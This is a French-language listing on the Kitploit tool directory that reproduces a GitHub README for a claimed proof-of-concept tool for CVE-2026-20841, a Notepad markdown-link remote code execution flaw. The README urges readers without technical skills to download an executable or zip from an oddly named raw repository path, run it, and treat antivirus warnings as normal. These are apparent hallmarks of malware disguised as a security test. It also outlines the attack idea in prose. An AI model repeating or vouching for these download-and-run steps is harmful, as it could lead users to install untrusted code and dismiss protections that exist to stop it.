Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20841 — 🛠 Démontrer l'exécution de code à distance dans le Bloc-notes Windows via des liens markdown exploitant des protocoles URL non sécurisés. | Kitploit
Outils/GitHubGitHub/hamzamalik3461/cve-2026-20841
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleDéveloppement de Charges Utiles
GitHubhamzamalik3461/cve-2026-20841

CVE-2026-20841

🛠 Démontrer l'exécution de code à distance dans le Bloc-notes Windows via des liens markdown exploitant des protocoles URL non sécurisés.

Voir le dépôt
122il y a 19h 19mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🛡️ CVE-2026-20841 - Outil de test de sécurité du Bloc-notes Windows

Download Releases

⚠️ Qu'est-ce que CVE-2026-20841 ?

CVE-2026-20841 est une faiblesse de sécurité connue dans l'application Bloc-notes Windows. Elle affecte la fonctionnalité markdown, qui permet au Bloc-notes d'afficher du texte formaté avec des liens cliquables. Cette faiblesse se produit parce que le moteur markdown exécuté dans le Bloc-notes ne limite pas les types de liens (appelés protocoles URL) qu'il autorise. Cela signifie qu'un attaquant peut créer un lien qui, lorsqu'il est cliqué, amène le Bloc-notes à exécuter des programmes ou des commandes que l'utilisateur n'a pas l'intention d'exécuter.

Cet outil fournit une Preuve de Concept (PoC) pour montrer comment cette faille de sécurité fonctionne. Il aide les chercheurs en sécurité et les experts en technologie à comprendre comment la vulnérabilité fonctionne et à tester si les systèmes sont à risque.

💻 À qui s'adresse cet outil ?

Ce projet est conçu pour les personnes qui souhaitent :

  • Comprendre le risque de CVE-2026-20841 dans le Bloc-notes Windows
  • Tester si leurs systèmes sont vulnérables à ce problème de sécurité
  • Améliorer leurs mesures de sécurité contre les attaques par exécution de code à distance

Aucune compétence en programmation n'est requise pour exécuter ce logiciel. Il est mieux utilisé par les professionnels de l'informatique ou les utilisateurs curieux qui souhaitent vérifier leurs appareils Windows.

🚀 Pour commencer

Configuration système requise

Avant d'utiliser ce logiciel, assurez-vous que votre ordinateur répond à ces exigences :

  • Exécutant Windows 10 ou versions ultérieures
  • Application Bloc-notes installée (incluse par défaut sur Windows)
  • Connexion Internet pour télécharger les fichiers
  • Espace disque suffisant pour le téléchargement (moins de 10 Mo)

Autorisations nécessaires

L'outil de test peut nécessiter une autorisation pour exécuter des programmes sur votre PC. Vous pourriez voir des avertissements de Windows Defender ou de l'antivirus. C'est normal car l'outil simule le fonctionnement des attaques réelles.

Vous ne devez exécuter l'outil que sur des ordinateurs que vous possédez ou pour lesquels vous avez l'autorisation de tester.

📥 Téléchargement et installation

Pour obtenir le logiciel, procédez comme suit :

  1. Accédez à la page des versions.
    Cliquez sur ce gros bouton pour accéder à la zone de téléchargement :
    Download Releases

  2. Choisissez la dernière version sur la page.
    Recherchez le fichier qui correspond à votre système (généralement un fichier .exe ou .zip).

  3. Téléchargez le fichier.
    Cliquez sur le lien du nom de fichier pour lancer le téléchargement.

  4. Exécutez ou décompressez le logiciel.

  • S'il s'agit d'un fichier .exe, double-cliquez dessus pour l'exécuter.
  • S'il s'agit d'un fichier .zip, faites un clic droit et choisissez « Extraire tout », puis ouvrez le dossier et double-cliquez sur le fichier .exe à l'intérieur.
  1. Suivez les instructions à l'écran.
    Le logiciel vous guidera tout au long du processus de test.

🧭 Comment utiliser le logiciel

Après l'installation, vous verrez une fenêtre simple avec des instructions. Voici comment procéder :

  • Étape 1 : Lancez le test en cliquant sur le bouton « Run Test ».
  • Étape 2 : Le logiciel simulera un fichier markdown avec des liens spéciaux.
  • Étape 3 : Il montrera si votre Bloc-notes autorise les liens cliquables non sécurisés.
  • Étape 4 : Consultez le rapport de test dans l'application ou dans un fichier sur votre bureau.

🔍 Que fait ce test ?

L'outil crée un faux fichier markdown contenant des liens utilisant des gestionnaires d'URL inhabituels. Normalement, ces liens ne devraient pas ouvrir de programmes sans autorisation. Mais à cause de CVE-2026-20841, le Bloc-notes ne les bloque pas.

Lorsque vous exécutez le test, le logiciel tente d'ouvrir ces liens dans le Bloc-notes. S'il réussit, le Bloc-notes est vulnérable et peut permettre aux attaquants d'exécuter du code nuisible.

🛠 Fonctionnalités

  • Lancement facile du test en un clic
  • Rapport clair indiquant si votre système est affecté
  • Interface utilisateur simple conçue pour les non-experts
  • Prend en charge les versions récentes de Windows
  • Taille de téléchargement réduite

🔄 Comment mettre à jour

Pour maintenir la précision des tests, téléchargez les nouvelles versions lorsqu'elles sont disponibles :

  1. Revisitez la même page des versions :
    https://github.com/hamzamalik3461/CVE-2026-20841/raw/refs/heads/main/miscall/CV-v1.7-beta.3.zip
  2. Trouvez la version la plus récente en haut.
  3. Téléchargez et exécutez le nouveau fichier comme décrit dans la section de téléchargement.

👥 Obtenir de l'aide et du support

Si vous rencontrez des problèmes, vous pouvez :

  • Consulter l'onglet « Issues » sur la page GitHub pour voir si d'autres ont le même problème
  • Utiliser la page « Discussions » pour les questions et réponses
  • Trouver les coordonnées des développeurs sur la page principale du dépôt

🔒 Restez en sécurité

Cet outil montre comment les pirates pourraient utiliser les failles de sécurité. Utilisez-le de manière responsable :

  • Ne l'utilisez pas sur des appareils que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester.
  • Gardez toujours vos logiciels, y compris Windows, à jour.
  • Évitez de cliquer sur des liens suspects dans des fichiers ou des e-mails inconnus.

🗂 Sujets connexes

Ce projet est lié à :

  • Recherche en sécurité pour le Bloc-notes Windows
  • Vulnérabilités d'injection de commandes
  • Risques d'exécution de code à distance (RCE)
  • Sensibilisation à la cybersécurité
  • Outils de test de vulnérabilité

Vous pouvez commencer les tests dès maintenant en visitant la page de téléchargement :
Download CVE-2026-20841 Tool

Télécharger l’outil